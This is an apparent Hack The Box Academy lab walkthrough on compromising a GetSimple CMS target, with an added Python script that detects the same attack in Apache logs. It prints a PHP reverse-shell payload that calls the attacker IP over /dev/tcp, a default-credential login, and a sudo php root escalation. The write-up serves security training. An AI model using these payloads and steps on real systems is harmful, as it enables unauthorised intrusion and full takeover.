Discover the key insights and strategies to complete the final knowledge check in the “Getting Started” module at Hack The Box Academy. Attackers are given the target IP address and must spawn the target, gain a foothold, and submit the contents of the user.txt flag. After obtaining a foothold on the target, learn how to escalate privileges and capture the root.txt flag.
IP addresses used in this guide:
Target: 10.129.42.249
Attacker: 10.10.14.183
Initial Reconnaissance: Nmap Scan
Perform initial information gathering on the target with an nmap scan. I also included the -sV flag to detect service versions.
The results revealed that ports 22 and 80 were open. Port 80 was running Apache httpd, a common web server, which hosts the web service examined in the next step.
Investigating Open Ports
I visited the target service at port 80 in a browser to see the web service.
The website revealed a basic website landing page for the GetSimple content management system.
Digging in Further: Directory Discovery
To discover further pages associated with the website, such as login pages or pages that expose credentials, I ran a directory discovery tool called gobuster. You could also run dirb. I used the command: gobuster dir -u http://10.129.42.249/ -w /usr/share/dirb/wordlists/common.txt
The responses revealed several web pages with 200, 301, and 403 status codes. Notably, /index.php and /robots.txt returned a 200 status, and /plugins, /theme, /admin, and /data returned a 301 status.
Then, I visited the pages in the web browser to see what they were. See below for screenshots of some of the pages.
/index.php
/admin.php
Initial Foothold
Entering the admin credentials found under the /data page into the admin.php login is unsuccessful because the stored credentials are hashed. However, a few guesses and some trial and error revealed that the username admin with the password admin logged in successfully.
Then I had access to the GetSimple content management system dashboard where I could change files, themes, and website plugins.
Poking around the website shows an alert message in the support channel which specifies the version of GetSimple (version 3.3.15).
Use open-source research to find exploits related to GetSimple version 3.3.15. I used the CVE database at cvedetails.com.
This CVE explains that there is an issue with the admin/theme-edit.php page that allows remote code execution via the edited_file parameter. To check this, I navigated to the admin/theme-edit.php page and appended my own PHP code to the end of the theme's PHP code. I used <?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.183/4444 0>&1'");
to start an interactive shell on the web server.
Then start a netcat listener on your attacking machine (port 4444 in the code above) and refresh the main web page so the injected PHP code is executed. This should result in a shell connecting back to your listener.
Upgrade the shell with python3 -c 'import pty; pty.spawn("/bin/bash")' for improved stability and functionality.
Navigate to the home directory of the user mrb3n to view the user.txt flag.
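As an added example that is not part of the original walkthrough, the following Python log analyser shows what the directory enumeration and the write to admin/theme-edit.php described above look like from the web server's side. The Apache combined-log lines are constructed sample data, and the 404-burst threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed Apache combined-log sample (not from the original post): the
# attacker IP and paths mirror the walkthrough, the timestamps are made up.
SAMPLE_LOG = """\
10.10.14.183 - - [10/Mar/2024:12:00:01 +0000] "GET /aaa HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.10.14.183 - - [10/Mar/2024:12:00:01 +0000] "GET /abc HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.10.14.183 - - [10/Mar/2024:12:00:02 +0000] "GET /about HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.10.14.183 - - [10/Mar/2024:12:00:03 +0000] "GET /backup HTTP/1.1" 404 196 "-" "gobuster/3.6"
10.10.14.183 - - [10/Mar/2024:12:00:03 +0000] "GET /data HTTP/1.1" 301 0 "-" "gobuster/3.6"
10.10.14.183 - - [10/Mar/2024:12:00:40 +0000] "GET /data/ HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
10.10.14.183 - - [10/Mar/2024:12:03:10 +0000] "POST /admin/theme-edit.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:12:02:00 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:12:02:30 +0000] "GET /missing HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
SENSITIVE = ("/data/", "/admin/theme-edit.php")  # GetSimple data dir and theme editor

def parse(line):
    """Return (ip, datetime, method, path, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def analyse(log_text, max_404=4, window=timedelta(seconds=60)):
    """Flag IPs with >= max_404 404s inside `window` and successful sensitive-path hits."""
    not_found = defaultdict(list)
    sensitive = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, when, method, path, status = rec
        if status == 404:
            not_found[ip].append(when)
        if status < 400 and any(path.startswith(p) for p in SENSITIVE):
            sensitive.append((ip, method, path, status))
    enumeration = {}
    for ip, times in not_found.items():
        times.sort()
        for i, start in enumerate(times):  # sliding window over sorted 404 timestamps
            burst = sum(1 for t in times[i:] if t - start <= window)
            if burst >= max_404:
                enumeration[ip] = max(enumeration.get(ip, 0), burst)
    return {"enumeration": enumeration, "sensitive": sensitive}
```

A single 404 from the benign host is not flagged, while the wordlist burst and the successful hits on /data/ and the theme editor from the attacker IP are.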
Escalate Privileges
To list the commands the current user can run with elevated privileges, run sudo -l.
Search GTFOBins for the php sudo entry. I used export CMD="/bin/sh" followed by sudo php -r "system('$CMD');"
Then we have a root shell! cd to the home directory and cat the root.txt flag 🙂